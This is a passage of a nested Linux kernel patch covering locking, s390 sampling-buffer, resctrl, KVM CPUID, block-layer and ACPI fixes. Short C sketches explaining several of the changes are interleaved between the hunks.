+ 				per_nest_pmu_arr = NULL;
+ 				goto err_free_mem;
+@@ -1812,7 +1808,7 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 			/* Register for cpu hotplug notification. */
+ 			ret = nest_pmu_cpumask_init();
+ 			if (ret) {
+-				mutex_unlock(&nest_init_lock);
++				spin_unlock(&nest_init_lock);
+ 				kfree(nest_imc_refc);
+ 				kfree(per_nest_pmu_arr);
+ 				per_nest_pmu_arr = NULL;
+@@ -1820,7 +1816,7 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 			}
+ 		}
+ 		nest_pmus++;
+-		mutex_unlock(&nest_init_lock);
++		spin_unlock(&nest_init_lock);
+ 		break;
+ 	case IMC_DOMAIN_CORE:
+ 		ret = core_imc_pmu_cpumask_init();
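/*
 * A minimal sketch of the refcount-under-spinlock shape the conversion
 * above settles on, modeled with a userspace pthread spinlock;
 * pmu_hw_start() is an illustrative stand-in for
 * opal_imc_counters_start().  The point of the kernel change is that a
 * spinlock, unlike a mutex, may be taken from the atomic perf
 * event_init/add/del callbacks.
 */
#include <pthread.h>

struct pmu_ref {
	pthread_spinlock_t lock;
	int refc;
};

static int pmu_hw_start(void) { return 0; }	/* placeholder */

static int pmu_ref_get(struct pmu_ref *ref)
{
	int rc = 0;

	pthread_spin_lock(&ref->lock);
	if (ref->refc == 0)
		rc = pmu_hw_start();	/* first user powers the counters on */
	if (rc == 0)
		ref->refc++;
	pthread_spin_unlock(&ref->lock);
	return rc;
}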
+diff --git a/arch/s390/include/asm/cpu_mf.h b/arch/s390/include/asm/cpu_mf.h
+index feaba12dbecb8..efa103b52a1a1 100644
+--- a/arch/s390/include/asm/cpu_mf.h
++++ b/arch/s390/include/asm/cpu_mf.h
+@@ -131,19 +131,21 @@ struct hws_combined_entry {
+ 	struct hws_diag_entry	diag;	/* Diagnostic-sampling data entry */
+ } __packed;
+ 
+-struct hws_trailer_entry {
+-	union {
+-		struct {
+-			unsigned int f:1;	/* 0 - Block Full Indicator   */
+-			unsigned int a:1;	/* 1 - Alert request control  */
+-			unsigned int t:1;	/* 2 - Timestamp format	      */
+-			unsigned int :29;	/* 3 - 31: Reserved	      */
+-			unsigned int bsdes:16;	/* 32-47: size of basic SDE   */
+-			unsigned int dsdes:16;	/* 48-63: size of diagnostic SDE */
+-		};
+-		unsigned long long flags;	/* 0 - 63: All indicators     */
++union hws_trailer_header {
++	struct {
++		unsigned int f:1;	/* 0 - Block Full Indicator   */
++		unsigned int a:1;	/* 1 - Alert request control  */
++		unsigned int t:1;	/* 2 - Timestamp format	      */
++		unsigned int :29;	/* 3 - 31: Reserved	      */
++		unsigned int bsdes:16;	/* 32-47: size of basic SDE   */
++		unsigned int dsdes:16;	/* 48-63: size of diagnostic SDE */
++		unsigned long long overflow; /* 64 - Overflow Count   */
+ 	};
+-	unsigned long long overflow;	 /* 64 - sample Overflow count	      */
++	__uint128_t val;
++};
++
++struct hws_trailer_entry {
++	union hws_trailer_header header; /* 0 - 15 Flags + Overflow Count     */
+ 	unsigned char timestamp[16];	 /* 16 - 31 timestamp		      */
+ 	unsigned long long reserved1;	 /* 32 -Reserved		      */
+ 	unsigned long long reserved2;	 /*				      */
+@@ -290,14 +292,11 @@ static inline unsigned long sample_rate_to_freq(struct hws_qsi_info_block *qsi,
+ 	return USEC_PER_SEC * qsi->cpu_speed / rate;
+ }
+ 
+-#define SDB_TE_ALERT_REQ_MASK	0x4000000000000000UL
+-#define SDB_TE_BUFFER_FULL_MASK 0x8000000000000000UL
+-
+ /* Return TOD timestamp contained in an trailer entry */
+ static inline unsigned long long trailer_timestamp(struct hws_trailer_entry *te)
+ {
+ 	/* TOD in STCKE format */
+-	if (te->t)
++	if (te->header.t)
+ 		return *((unsigned long long *) &te->timestamp[1]);
+ 
+ 	/* TOD in STCK format */
+diff --git a/arch/s390/include/asm/percpu.h b/arch/s390/include/asm/percpu.h
+index cb5fc06904354..081837b391e35 100644
+--- a/arch/s390/include/asm/percpu.h
++++ b/arch/s390/include/asm/percpu.h
+@@ -31,7 +31,7 @@
+ 	pcp_op_T__ *ptr__;						\
+ 	preempt_disable_notrace();					\
+ 	ptr__ = raw_cpu_ptr(&(pcp));					\
+-	prev__ = *ptr__;						\
++	prev__ = READ_ONCE(*ptr__);					\
+ 	do {								\
+ 		old__ = prev__;						\
+ 		new__ = old__ op (val);					\
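/*
 * A minimal sketch of why the hunk above reads the old value exactly
 * once: in a compare-and-swap loop the initial read must not be torn
 * or silently re-read by the compiler.  The same shape in C11 atomics:
 */
#include <stdatomic.h>

static long cmpxchg_add_return(_Atomic long *ptr, long val)
{
	long prev = atomic_load_explicit(ptr, memory_order_relaxed);	/* single read */
	long next;

	do {
		next = prev + val;
		/* on failure, prev is refreshed with the current value */
	} while (!atomic_compare_exchange_weak(ptr, &prev, next));

	return next;
}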
+diff --git a/arch/s390/kernel/machine_kexec_file.c b/arch/s390/kernel/machine_kexec_file.c
+index fc6d5f58debeb..2df94d32140c4 100644
+--- a/arch/s390/kernel/machine_kexec_file.c
++++ b/arch/s390/kernel/machine_kexec_file.c
+@@ -187,8 +187,6 @@ static int kexec_file_add_ipl_report(struct kimage *image,
+ 
+ 	data->memsz = ALIGN(data->memsz, PAGE_SIZE);
+ 	buf.mem = data->memsz;
+-	if (image->type == KEXEC_TYPE_CRASH)
+-		buf.mem += crashk_res.start;
+ 
+ 	ptr = (void *)ipl_cert_list_addr;
+ 	end = ptr + ipl_cert_list_size;
+@@ -225,6 +223,9 @@ static int kexec_file_add_ipl_report(struct kimage *image,
+ 		data->kernel_buf + offsetof(struct lowcore, ipl_parmblock_ptr);
+ 	*lc_ipl_parmblock_ptr = (__u32)buf.mem;
+ 
++	if (image->type == KEXEC_TYPE_CRASH)
++		buf.mem += crashk_res.start;
++
+ 	ret = kexec_add_buffer(&buf);
+ out:
+ 	return ret;
+diff --git a/arch/s390/kernel/perf_cpum_sf.c b/arch/s390/kernel/perf_cpum_sf.c
+index 332a499651308..ce886a03545ae 100644
+--- a/arch/s390/kernel/perf_cpum_sf.c
++++ b/arch/s390/kernel/perf_cpum_sf.c
+@@ -163,14 +163,15 @@ static void free_sampling_buffer(struct sf_buffer *sfb)
+ 
+ static int alloc_sample_data_block(unsigned long *sdbt, gfp_t gfp_flags)
+ {
+-	unsigned long sdb, *trailer;
++	struct hws_trailer_entry *te;
++	unsigned long sdb;
+ 
+ 	/* Allocate and initialize sample-data-block */
+ 	sdb = get_zeroed_page(gfp_flags);
+ 	if (!sdb)
+ 		return -ENOMEM;
+-	trailer = trailer_entry_ptr(sdb);
+-	*trailer = SDB_TE_ALERT_REQ_MASK;
++	te = (struct hws_trailer_entry *)trailer_entry_ptr(sdb);
++	te->header.a = 1;
+ 
+ 	/* Link SDB into the sample-data-block-table */
+ 	*sdbt = sdb;
+@@ -1206,7 +1207,7 @@ static void hw_collect_samples(struct perf_event *event, unsigned long *sdbt,
+ 					    "%s: Found unknown"
+ 					    " sampling data entry: te->f %i"
+ 					    " basic.def %#4x (%p)\n", __func__,
+-					    te->f, sample->def, sample);
++					    te->header.f, sample->def, sample);
+ 			/* Sample slot is not yet written or other record.
+ 			 *
+ 			 * This condition can occur if the buffer was reused
+@@ -1217,7 +1218,7 @@ static void hw_collect_samples(struct perf_event *event, unsigned long *sdbt,
+ 			 * that are not full.  Stop processing if the first
+ 			 * invalid format was detected.
+ 			 */
+-			if (!te->f)
++			if (!te->header.f)
+ 				break;
+ 		}
+ 
+@@ -1227,6 +1228,16 @@ static void hw_collect_samples(struct perf_event *event, unsigned long *sdbt,
+ 	}
+ }
+ 
++static inline __uint128_t __cdsg(__uint128_t *ptr, __uint128_t old, __uint128_t new)
++{
++	asm volatile(
++		"	cdsg	%[old],%[new],%[ptr]\n"
++		: [old] "+d" (old), [ptr] "+QS" (*ptr)
++		: [new] "d" (new)
++		: "memory", "cc");
++	return old;
++}
++
+ /* hw_perf_event_update() - Process sampling buffer
+  * @event:	The perf event
+  * @flush_all:	Flag to also flush partially filled sample-data-blocks
+@@ -1243,10 +1254,11 @@ static void hw_collect_samples(struct perf_event *event, unsigned long *sdbt,
+  */
+ static void hw_perf_event_update(struct perf_event *event, int flush_all)
+ {
++	unsigned long long event_overflow, sampl_overflow, num_sdb;
++	union hws_trailer_header old, prev, new;
+ 	struct hw_perf_event *hwc = &event->hw;
+ 	struct hws_trailer_entry *te;
+ 	unsigned long *sdbt;
+-	unsigned long long event_overflow, sampl_overflow, num_sdb, te_flags;
+ 	int done;
+ 
+ 	/*
+@@ -1266,25 +1278,25 @@ static void hw_perf_event_update(struct perf_event *event, int flush_all)
+ 		te = (struct hws_trailer_entry *) trailer_entry_ptr(*sdbt);
+ 
+ 		/* Leave loop if no more work to do (block full indicator) */
+-		if (!te->f) {
++		if (!te->header.f) {
+ 			done = 1;
+ 			if (!flush_all)
+ 				break;
+ 		}
+ 
+ 		/* Check the sample overflow count */
+-		if (te->overflow)
++		if (te->header.overflow)
+ 			/* Account sample overflows and, if a particular limit
+ 			 * is reached, extend the sampling buffer.
+ 			 * For details, see sfb_account_overflows().
+ 			 */
+-			sampl_overflow += te->overflow;
++			sampl_overflow += te->header.overflow;
+ 
+ 		/* Timestamps are valid for full sample-data-blocks only */
+ 		debug_sprintf_event(sfdbg, 6, "%s: sdbt %#lx "
+ 				    "overflow %llu timestamp %#llx\n",
+-				    __func__, (unsigned long)sdbt, te->overflow,
+-				    (te->f) ? trailer_timestamp(te) : 0ULL);
++				    __func__, (unsigned long)sdbt, te->header.overflow,
++				    (te->header.f) ? trailer_timestamp(te) : 0ULL);
+ 
+ 		/* Collect all samples from a single sample-data-block and
+ 		 * flag if an (perf) event overflow happened.  If so, the PMU
+@@ -1294,12 +1306,16 @@ static void hw_perf_event_update(struct perf_event *event, int flush_all)
+ 		num_sdb++;
+ 
+ 		/* Reset trailer (using compare-double-and-swap) */
++		/* READ_ONCE() 16 byte header */
++		prev.val = __cdsg(&te->header.val, 0, 0);
+ 		do {
+-			te_flags = te->flags & ~SDB_TE_BUFFER_FULL_MASK;
+-			te_flags |= SDB_TE_ALERT_REQ_MASK;
+-		} while (!cmpxchg_double(&te->flags, &te->overflow,
+-					 te->flags, te->overflow,
+-					 te_flags, 0ULL));
++			old.val = prev.val;
++			new.val = prev.val;
++			new.f = 0;
++			new.a = 1;
++			new.overflow = 0;
++			prev.val = __cdsg(&te->header.val, old.val, new.val);
++		} while (prev.val != old.val);
+ 
+ 		/* Advance to next sample-data-block */
+ 		sdbt++;
+@@ -1384,7 +1400,7 @@ static void aux_output_end(struct perf_output_handle *handle)
+ 	range_scan = AUX_SDB_NUM_ALERT(aux);
+ 	for (i = 0, idx = aux->head; i < range_scan; i++, idx++) {
+ 		te = aux_sdb_trailer(aux, idx);
+-		if (!(te->flags & SDB_TE_BUFFER_FULL_MASK))
++		if (!te->header.f)
+ 			break;
+ 	}
+ 	/* i is num of SDBs which are full */
+@@ -1392,7 +1408,7 @@ static void aux_output_end(struct perf_output_handle *handle)
+ 
+ 	/* Remove alert indicators in the buffer */
+ 	te = aux_sdb_trailer(aux, aux->alert_mark);
+-	te->flags &= ~SDB_TE_ALERT_REQ_MASK;
++	te->header.a = 0;
+ 
+ 	debug_sprintf_event(sfdbg, 6, "%s: SDBs %ld range %ld head %ld\n",
+ 			    __func__, i, range_scan, aux->head);
+@@ -1437,9 +1453,9 @@ static int aux_output_begin(struct perf_output_handle *handle,
+ 		idx = aux->empty_mark + 1;
+ 		for (i = 0; i < range_scan; i++, idx++) {
+ 			te = aux_sdb_trailer(aux, idx);
+-			te->flags &= ~(SDB_TE_BUFFER_FULL_MASK |
+-				       SDB_TE_ALERT_REQ_MASK);
+-			te->overflow = 0;
++			te->header.f = 0;
++			te->header.a = 0;
++			te->header.overflow = 0;
+ 		}
+ 		/* Save the position of empty SDBs */
+ 		aux->empty_mark = aux->head + range - 1;
+@@ -1448,7 +1464,7 @@ static int aux_output_begin(struct perf_output_handle *handle,
+ 	/* Set alert indicator */
+ 	aux->alert_mark = aux->head + range/2 - 1;
+ 	te = aux_sdb_trailer(aux, aux->alert_mark);
+-	te->flags = te->flags | SDB_TE_ALERT_REQ_MASK;
++	te->header.a = 1;
+ 
+ 	/* Reset hardware buffer head */
+ 	head = AUX_SDB_INDEX(aux, aux->head);
+@@ -1475,14 +1491,17 @@ static int aux_output_begin(struct perf_output_handle *handle,
+ static bool aux_set_alert(struct aux_buffer *aux, unsigned long alert_index,
+ 			  unsigned long long *overflow)
+ {
+-	unsigned long long orig_overflow, orig_flags, new_flags;
++	union hws_trailer_header old, prev, new;
+ 	struct hws_trailer_entry *te;
+ 
+ 	te = aux_sdb_trailer(aux, alert_index);
++	/* READ_ONCE() 16 byte header */
++	prev.val = __cdsg(&te->header.val, 0, 0);
+ 	do {
+-		orig_flags = te->flags;
+-		*overflow = orig_overflow = te->overflow;
+-		if (orig_flags & SDB_TE_BUFFER_FULL_MASK) {
++		old.val = prev.val;
++		new.val = prev.val;
++		*overflow = old.overflow;
++		if (old.f) {
+ 			/*
+ 			 * SDB is already set by hardware.
+ 			 * Abort and try to set somewhere
+@@ -1490,10 +1509,10 @@ static bool aux_set_alert(struct aux_buffer *aux, unsigned long alert_index,
+ 			 */
+ 			return false;
+ 		}
+-		new_flags = orig_flags | SDB_TE_ALERT_REQ_MASK;
+-	} while (!cmpxchg_double(&te->flags, &te->overflow,
+-				 orig_flags, orig_overflow,
+-				 new_flags, 0ULL));
++		new.a = 1;
++		new.overflow = 0;
++		prev.val = __cdsg(&te->header.val, old.val, new.val);
++	} while (prev.val != old.val);
+ 	return true;
+ }
+ 
+@@ -1522,8 +1541,9 @@ static bool aux_set_alert(struct aux_buffer *aux, unsigned long alert_index,
+ static bool aux_reset_buffer(struct aux_buffer *aux, unsigned long range,
+ 			     unsigned long long *overflow)
+ {
+-	unsigned long long orig_overflow, orig_flags, new_flags;
+ 	unsigned long i, range_scan, idx, idx_old;
++	union hws_trailer_header old, prev, new;
++	unsigned long long orig_overflow;
+ 	struct hws_trailer_entry *te;
+ 
+ 	debug_sprintf_event(sfdbg, 6, "%s: range %ld head %ld alert %ld "
+@@ -1554,17 +1574,20 @@ static bool aux_reset_buffer(struct aux_buffer *aux, unsigned long range,
+ 	idx_old = idx = aux->empty_mark + 1;
+ 	for (i = 0; i < range_scan; i++, idx++) {
+ 		te = aux_sdb_trailer(aux, idx);
++		/* READ_ONCE() 16 byte header */
++		prev.val = __cdsg(&te->header.val, 0, 0);
+ 		do {
+-			orig_flags = te->flags;
+-			orig_overflow = te->overflow;
+-			new_flags = orig_flags & ~SDB_TE_BUFFER_FULL_MASK;
++			old.val = prev.val;
++			new.val = prev.val;
++			orig_overflow = old.overflow;
++			new.f = 0;
++			new.overflow = 0;
+ 			if (idx == aux->alert_mark)
+-				new_flags |= SDB_TE_ALERT_REQ_MASK;
++				new.a = 1;
+ 			else
+-				new_flags &= ~SDB_TE_ALERT_REQ_MASK;
+-		} while (!cmpxchg_double(&te->flags, &te->overflow,
+-					 orig_flags, orig_overflow,
+-					 new_flags, 0ULL));
++				new.a = 0;
++			prev.val = __cdsg(&te->header.val, old.val, new.val);
++		} while (prev.val != old.val);
+ 		*overflow += orig_overflow;
+ 	}
+ 
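/*
 * A minimal sketch of the 16-byte trailer update pattern above, using
 * GCC's __atomic builtins in place of the s390 cdsg instruction (this
 * may pull in libatomic); the field layout is illustrative.  The
 * patch's __cdsg(ptr, 0, 0) idiom is an atomic 16-byte read: a
 * compare-and-swap that either fails and returns the current value,
 * or harmlessly swaps 0 for 0.
 */
struct trailer_header {
	unsigned int f:1;		/* block full indicator */
	unsigned int a:1;		/* alert request control */
	unsigned long long overflow;	/* sample overflow count */
};

union trailer {
	struct trailer_header h;
	__uint128_t val;
};

static void trailer_reset(union trailer *te)
{
	union trailer old, new;

	old.val = __atomic_load_n(&te->val, __ATOMIC_RELAXED);
	do {
		new = old;
		new.h.f = 0;		/* clear the full indicator */
		new.h.a = 1;		/* re-arm the alert request */
		new.h.overflow = 0;	/* consume the overflow count */
	} while (!__atomic_compare_exchange_n(&te->val, &old.val, new.val,
					      false, __ATOMIC_RELAXED,
					      __ATOMIC_RELAXED));
}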
+diff --git a/arch/x86/boot/bioscall.S b/arch/x86/boot/bioscall.S
+index 5521ea12f44e0..aa9b964575843 100644
+--- a/arch/x86/boot/bioscall.S
++++ b/arch/x86/boot/bioscall.S
+@@ -32,7 +32,7 @@ intcall:
+ 	movw	%dx, %si
+ 	movw	%sp, %di
+ 	movw	$11, %cx
+-	rep; movsd
++	rep; movsl
+ 
+ 	/* Pop full state from the stack */
+ 	popal
+@@ -67,7 +67,7 @@ intcall:
+ 	jz	4f
+ 	movw	%sp, %si
+ 	movw	$11, %cx
+-	rep; movsd
++	rep; movsl
+ 4:	addw	$44, %sp
+ 
+ 	/* Restore state and return */
+diff --git a/arch/x86/kernel/cpu/resctrl/monitor.c b/arch/x86/kernel/cpu/resctrl/monitor.c
+index efe0c30d3a12d..77538abeb72af 100644
+--- a/arch/x86/kernel/cpu/resctrl/monitor.c
++++ b/arch/x86/kernel/cpu/resctrl/monitor.c
+@@ -146,6 +146,30 @@ static inline struct rmid_entry *__rmid_entry(u32 rmid)
+ 	return entry;
+ }
+ 
++static int __rmid_read(u32 rmid, enum resctrl_event_id eventid, u64 *val)
++{
++	u64 msr_val;
++
++	/*
++	 * As per the SDM, when IA32_QM_EVTSEL.EvtID (bits 7:0) is configured
++	 * with a valid event code for supported resource type and the bits
++	 * IA32_QM_EVTSEL.RMID (bits 41:32) are configured with valid RMID,
++	 * IA32_QM_CTR.data (bits 61:0) reports the monitored data.
++	 * IA32_QM_CTR.Error (bit 63) and IA32_QM_CTR.Unavailable (bit 62)
++	 * are error bits.
++	 */
++	wrmsr(MSR_IA32_QM_EVTSEL, eventid, rmid);
++	rdmsrl(MSR_IA32_QM_CTR, msr_val);
++
++	if (msr_val & RMID_VAL_ERROR)
++		return -EIO;
++	if (msr_val & RMID_VAL_UNAVAIL)
++		return -EINVAL;
++
++	*val = msr_val;
++	return 0;
++}
++
+ static struct arch_mbm_state *get_arch_mbm_state(struct rdt_hw_domain *hw_dom,
+ 						 u32 rmid,
+ 						 enum resctrl_event_id eventid)
+@@ -172,8 +196,12 @@ void resctrl_arch_reset_rmid(struct rdt_resource *r, struct rdt_domain *d,
+ 	struct arch_mbm_state *am;
+ 
+ 	am = get_arch_mbm_state(hw_dom, rmid, eventid);
+-	if (am)
++	if (am) {
+ 		memset(am, 0, sizeof(*am));
++
++		/* Record any initial, non-zero count value. */
++		__rmid_read(rmid, eventid, &am->prev_msr);
++	}
+ }
+ 
+ static u64 mbm_overflow_count(u64 prev_msr, u64 cur_msr, unsigned int width)
+@@ -191,25 +219,14 @@ int resctrl_arch_rmid_read(struct rdt_resource *r, struct rdt_domain *d,
+ 	struct rdt_hw_domain *hw_dom = resctrl_to_arch_dom(d);
+ 	struct arch_mbm_state *am;
+ 	u64 msr_val, chunks;
++	int ret;
+ 
+ 	if (!cpumask_test_cpu(smp_processor_id(), &d->cpu_mask))
+ 		return -EINVAL;
+ 
+-	/*
+-	 * As per the SDM, when IA32_QM_EVTSEL.EvtID (bits 7:0) is configured
+-	 * with a valid event code for supported resource type and the bits
+-	 * IA32_QM_EVTSEL.RMID (bits 41:32) are configured with valid RMID,
+-	 * IA32_QM_CTR.data (bits 61:0) reports the monitored data.
+-	 * IA32_QM_CTR.Error (bit 63) and IA32_QM_CTR.Unavailable (bit 62)
+-	 * are error bits.
+-	 */
+-	wrmsr(MSR_IA32_QM_EVTSEL, eventid, rmid);
+-	rdmsrl(MSR_IA32_QM_CTR, msr_val);
+-
+-	if (msr_val & RMID_VAL_ERROR)
+-		return -EIO;
+-	if (msr_val & RMID_VAL_UNAVAIL)
+-		return -EINVAL;
++	ret = __rmid_read(rmid, eventid, &msr_val);
++	if (ret)
++		return ret;
+ 
+ 	am = get_arch_mbm_state(hw_dom, rmid, eventid);
+ 	if (am) {
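/*
 * A minimal sketch of why resctrl_arch_reset_rmid() above records an
 * initial reading: the hardware MBM counters are free-running and are
 * never zeroed, so "reset" means taking a baseline and reporting
 * deltas from it.  Names here are illustrative, not the kernel's.
 */
struct mbm_state {
	unsigned long long prev_msr;	/* baseline recorded at reset */
	unsigned long long chunks;	/* accumulated delta since reset */
};

static void mbm_reset(struct mbm_state *s, unsigned long long cur)
{
	s->chunks = 0;
	s->prev_msr = cur;	/* record any initial, non-zero count */
}

static unsigned long long mbm_read(struct mbm_state *s, unsigned long long cur)
{
	s->chunks += cur - s->prev_msr;	/* the kernel also masks to the hardware counter width */
	s->prev_msr = cur;
	return s->chunks;
}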
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index e5a48f05e7876..5993da21d8225 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -580,8 +580,10 @@ static int __rdtgroup_move_task(struct task_struct *tsk,
+ 	/*
+ 	 * Ensure the task's closid and rmid are written before determining if
+ 	 * the task is current that will decide if it will be interrupted.
++	 * This pairs with the full barrier between the rq->curr update and
++	 * resctrl_sched_in() during context switch.
+ 	 */
+-	barrier();
++	smp_mb();
+ 
+ 	/*
+ 	 * By now, the task's closid and rmid are set. If the task is current
+@@ -2401,6 +2403,14 @@ static void rdt_move_group_tasks(struct rdtgroup *from, struct rdtgroup *to,
+ 			WRITE_ONCE(t->closid, to->closid);
+ 			WRITE_ONCE(t->rmid, to->mon.rmid);
+ 
++			/*
++			 * Order the closid/rmid stores above before the loads
++			 * in task_curr(). This pairs with the full barrier
++			 * between the rq->curr update and resctrl_sched_in()
++			 * during context switch.
++			 */
++			smp_mb();
++
+ 			/*
+ 			 * If the task is on a CPU, set the CPU in the mask.
+ 			 * The detection is inaccurate as tasks might move or
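/*
 * A minimal sketch of the barrier pairing described above, in C11
 * form.  The mover stores the new closid/rmid, issues a full fence,
 * then checks whether the task is running; the scheduler side does the
 * mirror-image update, fence, load.  With only a compiler barrier()
 * the store and the task_curr() load could be reordered and the
 * resched IPI skipped.
 */
#include <stdatomic.h>
#include <stdbool.h>

static _Atomic int task_closid;
static _Atomic bool task_running;

static void move_task(int new_closid)
{
	atomic_store_explicit(&task_closid, new_closid, memory_order_relaxed);
	atomic_thread_fence(memory_order_seq_cst);	/* pairs with the scheduler's fence */
	if (atomic_load_explicit(&task_running, memory_order_relaxed)) {
		/* kick the CPU so it reloads the new closid */
	}
}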
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index 62bc7a01cecca..6047dbe048803 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -759,16 +759,22 @@ struct kvm_cpuid_array {
+ 	int nent;
+ };
+ 
++static struct kvm_cpuid_entry2 *get_next_cpuid(struct kvm_cpuid_array *array)
++{
++	if (array->nent >= array->maxnent)
++		return NULL;
++
++	return &array->entries[array->nent++];
++}
++
+ static struct kvm_cpuid_entry2 *do_host_cpuid(struct kvm_cpuid_array *array,
+ 					      u32 function, u32 index)
+ {
+-	struct kvm_cpuid_entry2 *entry;
++	struct kvm_cpuid_entry2 *entry = get_next_cpuid(array);
+ 
+-	if (array->nent >= array->maxnent)
++	if (!entry)
+ 		return NULL;
+ 
+-	entry = &array->entries[array->nent++];
+-
+ 	memset(entry, 0, sizeof(*entry));
+ 	entry->function = function;
+ 	entry->index = index;
+@@ -945,22 +951,13 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		entry->edx = edx.full;
+ 		break;
+ 	}
+-	/*
+-	 * Per Intel's SDM, the 0x1f is a superset of 0xb,
+-	 * thus they can be handled by common code.
+-	 */
+ 	case 0x1f:
+ 	case 0xb:
+ 		/*
+-		 * Populate entries until the level type (ECX[15:8]) of the
+-		 * previous entry is zero.  Note, CPUID EAX.{0x1f,0xb}.0 is
+-		 * the starting entry, filled by the primary do_host_cpuid().
++		 * No topology; a valid topology is indicated by the presence
++		 * of subleaf 1.
+ 		 */
+-		for (i = 1; entry->ecx & 0xff00; ++i) {
+-			entry = do_host_cpuid(array, function, i);
+-			if (!entry)
+-				goto out;
+-		}
++		entry->eax = entry->ebx = entry->ecx = 0;
+ 		break;
+ 	case 0xd: {
+ 		u64 permitted_xcr0 = kvm_caps.supported_xcr0 & xstate_get_guest_group_perm();
+@@ -1193,6 +1190,9 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		entry->ebx = entry->ecx = entry->edx = 0;
+ 		break;
+ 	case 0x8000001e:
++		/* Do not return host topology information.  */
++		entry->eax = entry->ebx = entry->ecx = 0;
++		entry->edx = 0; /* reserved */
+ 		break;
+ 	case 0x8000001F:
+ 		if (!kvm_cpu_cap_has(X86_FEATURE_SEV)) {
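/*
 * A minimal sketch of the cursor-helper shape introduced by
 * get_next_cpuid() above: returning NULL when the array is full lets
 * every caller share one bounds check.  Types are illustrative.
 */
#include <stddef.h>

struct entry { unsigned int function, index; };

struct entry_array {
	struct entry *entries;
	size_t nent, maxnent;
};

static struct entry *get_next_entry(struct entry_array *a)
{
	if (a->nent >= a->maxnent)
		return NULL;	/* caller maps this to an E2BIG-style error */

	return &a->entries[a->nent++];
}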
+diff --git a/arch/x86/mm/pat/memtype.c b/arch/x86/mm/pat/memtype.c
+index 66a209f7eb86d..2642bc4c8ec07 100644
+--- a/arch/x86/mm/pat/memtype.c
++++ b/arch/x86/mm/pat/memtype.c
+@@ -434,7 +434,8 @@ static unsigned long pat_x_mtrr_type(u64 start, u64 end,
+ 		u8 mtrr_type, uniform;
+ 
+ 		mtrr_type = mtrr_type_lookup(start, end, &uniform);
+-		if (mtrr_type != MTRR_TYPE_WRBACK)
++		if (mtrr_type != MTRR_TYPE_WRBACK &&
++		    mtrr_type != MTRR_TYPE_INVALID)
+ 			return _PAGE_CACHE_MODE_UC_MINUS;
+ 
+ 		return _PAGE_CACHE_MODE_WB;
+diff --git a/arch/x86/um/elfcore.c b/arch/x86/um/elfcore.c
+index 48a3eb09d9516..650cdbbdaf45e 100644
+--- a/arch/x86/um/elfcore.c
++++ b/arch/x86/um/elfcore.c
+@@ -7,7 +7,7 @@
+ #include <asm/elf.h>
+ 
+ 
+-Elf32_Half elf_core_extra_phdrs(void)
++Elf32_Half elf_core_extra_phdrs(struct coredump_params *cprm)
+ {
+ 	return vsyscall_ehdr ? (((struct elfhdr *)vsyscall_ehdr)->e_phnum) : 0;
+ }
+@@ -60,7 +60,7 @@ int elf_core_write_extra_data(struct coredump_params *cprm)
+ 	return 1;
+ }
+ 
+-size_t elf_core_extra_data_size(void)
++size_t elf_core_extra_data_size(struct coredump_params *cprm)
+ {
+ 	if ( vsyscall_ehdr ) {
+ 		const struct elfhdr *const ehdrp =
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index f46c87ef951df..84f03d066cb31 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -358,11 +358,13 @@ struct bio *__bio_split_to_limits(struct bio *bio, struct queue_limits *lim,
+ 	default:
+ 		split = bio_split_rw(bio, lim, nr_segs, bs,
+ 				get_max_io_size(bio, lim) << SECTOR_SHIFT);
++		if (IS_ERR(split))
++			return NULL;
+ 		break;
+ 	}
+ 
+ 	if (split) {
+-		/* there isn't chance to merge the splitted bio */
++		/* there is no chance to merge the split bio */
+ 		split->bi_opf |= REQ_NOMERGE;
+ 
+ 		blkcg_bio_issue_init(split);
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 0b855e033a834..63abbe342b28c 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2919,8 +2919,11 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	blk_status_t ret;
+ 
+ 	bio = blk_queue_bounce(bio, q);
+-	if (bio_may_exceed_limits(bio, &q->limits))
++	if (bio_may_exceed_limits(bio, &q->limits)) {
+ 		bio = __bio_split_to_limits(bio, &q->limits, &nr_segs);
++		if (!bio)
++			return;
++	}
+ 
+ 	if (!bio_integrity_prep(bio))
+ 		return;
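/*
 * A minimal sketch of the caller contract the two hunks above
 * establish: on a split failure the helper completes the original bio
 * and returns NULL, so every submit path must bail out rather than
 * dereference the result.  example_submit_bio() is illustrative.
 */
struct bio;
struct bio *bio_split_to_limits(struct bio *bio);

static void example_submit_bio(struct bio *bio)
{
	bio = bio_split_to_limits(bio);
	if (!bio)	/* split failed; the bio was already ended */
		return;

	/* ... continue with the (possibly trimmed) bio ... */
}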
+diff --git a/drivers/acpi/glue.c b/drivers/acpi/glue.c
+index 204fe94c7e458..a194f30876c59 100644
+--- a/drivers/acpi/glue.c
++++ b/drivers/acpi/glue.c
+@@ -75,7 +75,8 @@ static struct acpi_bus_type *acpi_get_bus_type(struct device *dev)
+ }
+ 
+ #define FIND_CHILD_MIN_SCORE	1
+-#define FIND_CHILD_MAX_SCORE	2
++#define FIND_CHILD_MID_SCORE	2
++#define FIND_CHILD_MAX_SCORE	3
+ 
+ static int match_any(struct acpi_device *adev, void *not_used)
+ {
+@@ -96,8 +97,17 @@ static int find_child_checks(struct acpi_device *adev, bool check_children)
+ 		return -ENODEV;
+ 
+ 	status = acpi_evaluate_integer(adev->handle, "_STA", NULL, &sta);
+-	if (status == AE_NOT_FOUND)
++	if (status == AE_NOT_FOUND) {
++		/*
++		 * Special case: backlight device objects without _STA are
++		 * preferred to other objects with the same _ADR value, because
++		 * it is more likely that they are actually useful.
++		 */
++		if (adev->pnp.type.backlight)
++			return FIND_CHILD_MID_SCORE;
++
